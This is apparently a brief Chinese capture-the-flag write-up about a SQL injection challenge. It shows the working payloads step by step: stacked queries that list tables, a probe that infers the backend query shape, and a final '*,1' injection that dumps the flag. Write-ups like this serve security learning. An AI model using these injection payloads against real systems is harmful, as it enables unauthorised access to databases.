打开题目,简单测试,可以发现是数字型注入
对于提交的数据,字符不回显,除零回显不同外,任何数字都有相同回显,union被过滤,但在尝试堆叠注入时成功。
query=1;show tables;
Array ( [0] => 1 ) Array ( [0] => Flag )
在后续测试中发现,如果在提交的数字后加入分号,则回显的数据为提交的数字,猜测查询语句的前半段为
select $_POST['query'] ...
验证
query=13;select 4
Array ( [0] => 13 ) Array ( [0] => 1 )
猜测正确,那这不是白给吗,
query=*,1
得到flag